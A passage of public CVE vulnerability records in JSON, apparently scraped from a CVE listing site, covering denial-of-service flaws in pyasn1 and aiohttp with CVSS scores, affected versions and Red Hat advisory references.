"value": "RHSA-2026:2486: Red Hat Enterprise Linux AppStream AUS (v.8.6), Red Hat Enterprise Linux AppStream E4S (v.8.6), Red Hat Enterprise Linux AppStream TUS (v.8.6), Red Hat Enterprise Linux High Availability E4S (v.8.6), Red Hat Enterprise Linux High Availability TUS (v.8.6)"
},
{
"lang": "en",
"value": "RHSA-2026:4144: Red Hat Enterprise Linux AppStream AUS (v.8.6), Red Hat Enterprise Linux AppStream E4S (v.8.6), Red Hat Enterprise Linux AppStream TUS (v.8.6)"
},
{
"lang": "en",
"value": "RHSA-2026:2221: Red Hat Enterprise Linux AppStream E4S (v.8.8), Red Hat Enterprise Linux AppStream TUS (v.8.8), Red Hat Enterprise Linux High Availability E4S (v.8.8), Red Hat Enterprise Linux High Availability TUS (v.8.8)"
},
{
"lang": "en",
"value": "RHSA-2026:4139: Red Hat Enterprise Linux AppStream E4S (v.8.8), Red Hat Enterprise Linux AppStream TUS (v.8.8)"
},
{
"lang": "en",
"value": "RHSA-2026:2303: Red Hat Enterprise Linux AppStream E4S (v.9.0), Red Hat Enterprise Linux High Availability E4S (v.9.0), Red Hat Enterprise Linux ResilientStorage E4S (v.9.0)"
},
{
"lang": "en",
"value": "RHSA-2026:4140: Red Hat Enterprise Linux AppStream E4S (v.9.0)"
},
{
"lang": "en",
"value": "RHSA-2026:2300: Red Hat Enterprise Linux AppStream E4S (v.9.2), Red Hat Enterprise Linux High Availability E4S (v.9.2), Red Hat Enterprise Linux Resilient Storage E4S (v.9.2)"
},
{
"lang": "en",
"value": "RHSA-2026:4142: Red Hat Enterprise Linux AppStream E4S (v.9.2)"
},
{
"lang": "en",
"value": "RHSA-2026:2302: Red Hat Enterprise Linux AppStream EUS (v.9.4), Red Hat Enterprise Linux High Availability EUS (v.9.4), Red Hat Enterprise Linux Resilient Storage EUS (v.9.4)"
},
{
"lang": "en",
"value": "RHSA-2026:4143: Red Hat Enterprise Linux AppStream EUS (v.9.4)"
},
{
"lang": "en",
"value": "RHSA-2026:2299: Red Hat Enterprise Linux AppStream EUS (v.9.6)"
},
{
"lang": "en",
"value": "RHSA-2026:4141: Red Hat Enterprise Linux AppStream EUS (v.9.6)"
},
{
"lang": "en",
"value": "RHSA-2026:1903: Red Hat Enterprise Linux AppStream (v. 9)"
},
{
"lang": "en",
"value": "RHSA-2026:3359: Red Hat Enterprise Linux AppStream (v. 9)"
},
{
"lang": "en",
"value": "RHSA-2026:1904: Red Hat Enterprise Linux HighAvailability (v. 8), Red Hat Enterprise Linux ResilientStorage (v. 8)"
},
{
"lang": "en",
"value": "RHSA-2026:2712: Red Hat Enterprise Linux High Availability AUS (v.8.4), Red Hat Enterprise Linux HighAvailability EUS EXTENSION (v.8.4)"
},
{
"lang": "en",
"value": "RHSA-2026:2453: Red Hat Enterprise Linux High Availability E4S (v.8.6), Red Hat Enterprise Linux High Availability TUS (v.8.6)"
},
{
"lang": "en",
"value": "RHSA-2026:2460: Red Hat Enterprise Linux High Availability E4S (v.8.8), Red Hat Enterprise Linux High Availability TUS (v.8.8)"
},
{
"lang": "en",
"value": "RHSA-2026:30088: Red Hat AI Inference Server 3.3"
},
{
"lang": "en",
"value": "RHSA-2026:13553: Red Hat Ansible Automation Platform 2.5"
},
{
"lang": "en",
"value": "RHSA-2026:13545: Red Hat Ansible Automation Platform 2.6"
},
{
"lang": "en",
"value": "RHSA-2026:24866: Red Hat Ansible Automation Platform 2.6"
},
{
"lang": "en",
"value": "RHSA-2026:5606: Red Hat Ceph Storage 8"
},
{
"lang": "en",
"value": "RHSA-2026:17611: Red Hat Enterprise Linux AI 3.3"
},
{
"lang": "en",
"value": "RHSA-2026:24977: Red Hat OpenShift AI 2.25"
},
{
"lang": "en",
"value": "RHSA-2026:19712: Red Hat OpenShift AI 3.3"
},
{
"lang": "en",
"value": "RHSA-2026:14020: Red Hat OpenStack 1.5"
},
{
"lang": "en",
"value": "RHSA-2026:24476: Red Hat Trusted Artifact Signer 1.3"
},
{
"lang": "en",
"value": "RHSA-2026:24483: Red Hat Trusted Artifact Signer 1.4"
},
{
"lang": "en",
"value": "RHSA-2026:4943: Red Hat Update Infrastructure 5"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-01-16T20:03:33.790Z",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2026-01-16T19:03:36.442Z",
"value": "Made public."
}
],
"title": "pyasn1: pyasn1: Denial of Service due to memory exhaustion from malformed RELATIVE-OID",
"x_adpType": "supplier",
"x_generator": {
"engine": "sadp-cli 1.0.0"
}
}
],
"cna": {
"affected": [
{
"product": "pyasn1",
"vendor": "pyasn1",
"versions": [
{
"status": "affected",
"version": "\u003c 0.6.2"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.2, a Denial-of-Service issue has been found that leads to memory exhaustion from malformed RELATIVE-OID with excessive continuation octets. This vulnerability is fixed in 0.6.2."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "CWE-770: Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-01-16T19:03:36.442Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq"
},
{
"name": "https://github.com/pyasn1/pyasn1/commit/3908f144229eed4df24bd569d16e5991ace44970",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pyasn1/pyasn1/commit/3908f144229eed4df24bd569d16e5991ace44970"
},
{
"name": "https://github.com/pyasn1/pyasn1/releases/tag/v0.6.2",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pyasn1/pyasn1/releases/tag/v0.6.2"
}
],
"source": {
"advisory": "GHSA-63vm-454h-vhhq",
"discovery": "UNKNOWN"
},
"title": "pyasn1 has a DoS vulnerability in decoder"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-23490",
"datePublished": "2026-01-16T19:03:36.442Z",
"dateReserved": "2026-01-13T15:47:41.628Z",
"dateUpdated": "2026-07-01T12:05:02.871Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-34517 (GCVE-0-2026-34517)
Vulnerability from cvelistv5 – Published: 2026-04-01 20:14 – Updated: 2026-06-23 15:50- CWE-770 - Allocation of Resources Without Limits or Throttling
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-34517",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-04-02T15:13:50.407256Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-06-23T15:50:45.307Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "aiohttp",
"vendor": "aio-libs",
"versions": [
{
"status": "affected",
"version": "\u003c 3.13.4"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to version 3.13.4, for some multipart form fields, aiohttp read the entire field into memory before checking client_max_size. This issue has been patched in version 3.13.4."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 2.7,
"baseSeverity": "LOW",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "CWE-770: Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-01T20:14:15.830Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-3wq7-rqq7-wx6j",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-3wq7-rqq7-wx6j"
},
{
"name": "https://github.com/aio-libs/aiohttp/commit/cbb774f38330563422ca0c413a71021d7b944145",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/commit/cbb774f38330563422ca0c413a71021d7b944145"
},
{
"name": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"
}
],
"source": {
"advisory": "GHSA-3wq7-rqq7-wx6j",
"discovery": "UNKNOWN"
},
"title": "AIOHTTP: Late size enforcement for non-file multipart fields causes memory DoS"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-34517",
"datePublished": "2026-04-01T20:14:15.830Z",
"dateReserved": "2026-03-30T16:03:31.047Z",
"dateUpdated": "2026-06-23T15:50:45.307Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-69223 (GCVE-0-2025-69223)
Vulnerability from cvelistv5 – Published: 2026-01-05 22:00 – Updated: 2026-07-03 12:05| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-69223",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-06T14:26:17.561184Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-06T19:04:01.249Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"affected": [
{
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2.4::el8",
"cpe:/a:redhat:ansible_automation_platform_developer:2.4::el8",
"cpe:/a:redhat:ansible_automation_platform_inside:2.4::el8"
],
"defaultStatus": "affected",
"product": "Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2.5::el8",
"cpe:/a:redhat:ansible_automation_platform_developer:2.5::el8",
"cpe:/a:redhat:ansible_automation_platform_inside:2.5::el8"
],
"defaultStatus": "affected",
"product": "Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2.4::el9",
"cpe:/a:redhat:ansible_automation_platform_developer:2.4::el9",
"cpe:/a:redhat:ansible_automation_platform_inside:2.4::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2.5::el9",
"cpe:/a:redhat:ansible_automation_platform_developer:2.5::el9",
"cpe:/a:redhat:ansible_automation_platform_inside:2.5::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Ansible Automation Platform 2.5 for RHEL 9",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2.6::el9",
"cpe:/a:redhat:ansible_automation_platform_developer:2.6::el9",
"cpe:/a:redhat:ansible_automation_platform_inside:2.6::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ai_inference_server:3.2::el9"
],
"defaultStatus": "affected",
"product": "Red Hat AI Inference Server 3.2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2.4::el8"
],
"defaultStatus": "affected",
"product": "Red Hat Ansible Automation Platform 2.4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2.5::el8"
],
"defaultStatus": "affected",
"product": "Red Hat Ansible Automation Platform 2.5",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2.6::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Ansible Automation Platform 2.6",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_ai:2.25::el9"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift AI 2.25",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_ai:3.3::el9"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift AI 3.3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhmt:1"
],
"defaultStatus": "affected",
"product": "Migration Toolkit for Containers",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_lightspeed"
],
"defaultStatus": "affected",
"product": "OpenShift Lightspeed",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ai_inference_server:3"
],
"defaultStatus": "affected",
"product": "Red Hat AI Inference Server",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "affected",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ansible_core:2"
],
"defaultStatus": "affected",
"product": "Red Hat Ansible Automation Platform Ansible Core 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:enterprise_linux_ai:3"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AI (RHEL AI) 3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_ai"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift AI (RHOAI)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:satellite:6"
],
"defaultStatus": "affected",
"product": "Red Hat Satellite 6",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2.6::el10",
"cpe:/a:redhat:ansible_automation_platform_developer:2.6::el10"
],
"defaultStatus": "unaffected",
"product": "Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_mesh:2"
],
"defaultStatus": "unaffected",
"product": "OpenShift Service Mesh 2",
"vendor": "Red Hat"
}
],
"datePublic": "2026-01-05T22:00:17.715Z",
"descriptions": [
{
"lang": "en",
"value": "A decompression based denial of service flaw has been discovered in the AIOHTTP python library. Library versions 3.13.2 and below allow a zip bomb to be used to execute a DoS against the AIOHTTP server. An attacker may be able to send a compressed request that when decompressed by AIOHTTP could exhaust the host\u0027s memory."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Important"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-07-03T12:05:00.052Z",
"orgId": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"shortName": "redhat-SADP"
},
"references": [
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2025-69223"
},
{
"name": "RHBZ#2427456",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2427456"
},
{
"tags": [
"x_sadp-csaf-vex"
],
"url": "https://security.access.redhat.com/data/csaf/v2/vex/2025/cve-2025-69223.json"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:1497"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:1506"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:3959"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:1249"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:3958"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:3461"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:3462"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:1599"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:1609"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:6308"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:1596"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:3960"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:6309"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:3782"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:10184"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:2106"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:2695"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:3713"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:19712"
}
],
"solutions": [
{
"lang": "en",
"value": "RHSA-2026:1497: Red Hat Ansible Automation Platform 2.4 for RHEL 8, Red Hat Ansible Automation Platform 2.4 for RHEL 9"
},
{
"lang": "en",
"value": "RHSA-2026:1506: Red Hat Ansible Automation Platform 2.5 for RHEL 8, Red Hat Ansible Automation Platform 2.5 for RHEL 9"
},
{
"lang": "en",
"value": "RHSA-2026:3959: Red Hat Ansible Automation Platform 2.5 for RHEL 8, Red Hat Ansible Automation Platform 2.5 for RHEL 9"
},
{
"lang": "en",
"value": "RHSA-2026:1249: Red Hat Ansible Automation Platform 2.6 for RHEL 9"
},
{
"lang": "en",
"value": "RHSA-2026:3958: Red Hat Ansible Automation Platform 2.6 for RHEL 9"
},
{
"lang": "en",
"value": "RHSA-2026:3461: Red Hat AI Inference Server 3.2"
},
{
"lang": "en",
"value": "RHSA-2026:3462: Red Hat AI Inference Server 3.2"
},
{
"lang": "en",
"value": "RHSA-2026:1599: Red Hat Ansible Automation Platform 2.4"
},
{
"lang": "en",
"value": "RHSA-2026:1609: Red Hat Ansible Automation Platform 2.5"
},
{
"lang": "en",
"value": "RHSA-2026:6308: Red Hat Ansible Automation Platform 2.5"
},
{
"lang": "en",
"value": "RHSA-2026:1596: Red Hat Ansible Automation Platform 2.6"
},
{
"lang": "en",
"value": "RHSA-2026:3960: Red Hat Ansible Automation Platform 2.6"
},
{
"lang": "en",
"value": "RHSA-2026:6309: Red Hat Ansible Automation Platform 2.6"
},
{
"lang": "en",
"value": "RHSA-2026:3782: Red Hat OpenShift AI 2.25"
},
{
"lang": "en",
"value": "RHSA-2026:10184: Red Hat OpenShift AI 2.25"
},
{
"lang": "en",
"value": "RHSA-2026:2106: Red Hat OpenShift AI 2.25"
},
{
"lang": "en",
"value": "RHSA-2026:2695: Red Hat OpenShift AI 2.25"
},
{
"lang": "en",
"value": "RHSA-2026:3713: Red Hat OpenShift AI 3.3"
},
{
"lang": "en",
"value": "RHSA-2026:19712: Red Hat OpenShift AI 3.3"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-01-06T20:01:19.831Z",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2026-01-05T22:00:17.715Z",
"value": "Made public."
}
],
"title": "aiohttp: AIOHTTP\u0027s HTTP Parser auto_decompress feature is vulnerable to zip bomb",
"workarounds": [
{
"lang": "en",
"value": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability."
}
],
"x_adpType": "supplier",
"x_generator": {
"engine": "sadp-cli 1.0.0"
}
}
],
"cna": {
"affected": [
{
"product": "aiohttp",
"vendor": "aio-libs",
"versions": [
{
"status": "affected",
"version": "\u003c 3.13.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Versions 3.13.2 and below allow a zip bomb to be used to execute a DoS against the AIOHTTP server. An attacker may be able to send a compressed request that when decompressed by AIOHTTP could exhaust the host\u0027s memory. This issue is fixed in version 3.13.3."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-409",
"description": "CWE-409: Improper Handling of Highly Compressed Data (Data Amplification)",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "CWE-770: Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-01-05T22:00:17.715Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-6mq8-rvhq-8wgg",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-6mq8-rvhq-8wgg"
},
{
"name": "https://github.com/aio-libs/aiohttp/commit/2b920c39002cee0ec5b402581779bbaaf7c9138a",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/commit/2b920c39002cee0ec5b402581779bbaaf7c9138a"
}
],
"source": {
"advisory": "GHSA-6mq8-rvhq-8wgg",
"discovery": "UNKNOWN"
},
"title": "AIOHTTP\u0027s HTTP Parser auto_decompress feature is vulnerable to zip bomb"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-69223",
"datePublished": "2026-01-05T22:00:17.715Z",
"dateReserved": "2025-12-29T20:45:58.699Z",
"dateUpdated": "2026-07-03T12:05:00.052Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-22815 (GCVE-0-2026-22815)
Vulnerability from cvelistv5 – Published: 2026-04-01 20:08 – Updated: 2026-04-04 03:10| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2026-22815",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-04-04T03:09:26.684383Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-04-04T03:10:24.396Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "aiohttp",
"vendor": "aio-libs",
"versions": [
{
"status": "affected",
"version": "\u003c 3.13.4"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to version 3.13.4, insufficient restrictions in header/trailer handling could cause uncapped memory usage. This issue has been patched in version 3.13.4."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-400",
"description": "CWE-400: Uncontrolled Resource Consumption",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "CWE-770: Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-01T20:08:08.800Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-w2fm-2cpv-w7v5",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-w2fm-2cpv-w7v5"
},
{
"name": "https://github.com/aio-libs/aiohttp/commit/0c2e9da51126238a421568eb7c5b53e5b5d17b36",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/commit/0c2e9da51126238a421568eb7c5b53e5b5d17b36"
},
{
"name": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"
}
],
"source": {
"advisory": "GHSA-w2fm-2cpv-w7v5",
"discovery": "UNKNOWN"
},
"title": "AIOHTTP: Uncapped memory usage possible through aiohttp allowing unlimited trailer headers"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-22815",
"datePublished": "2026-04-01T20:08:08.800Z",
"dateReserved": "2026-01-09T22:50:10.288Z",
"dateUpdated": "2026-04-04T03:10:24.396Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-34073 (GCVE-0-2026-34073)
Vulnerability from cvelistv5 – Published: 2026-03-31 02:04 – Updated: 2026-03-31 13:52- CWE-295 - Improper Certificate Validation
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
| Vendor | Product | Version | ||
|---|---|---|---|---|
| pyca | cryptography |
Affected:
< 46.0.6
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-34073",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
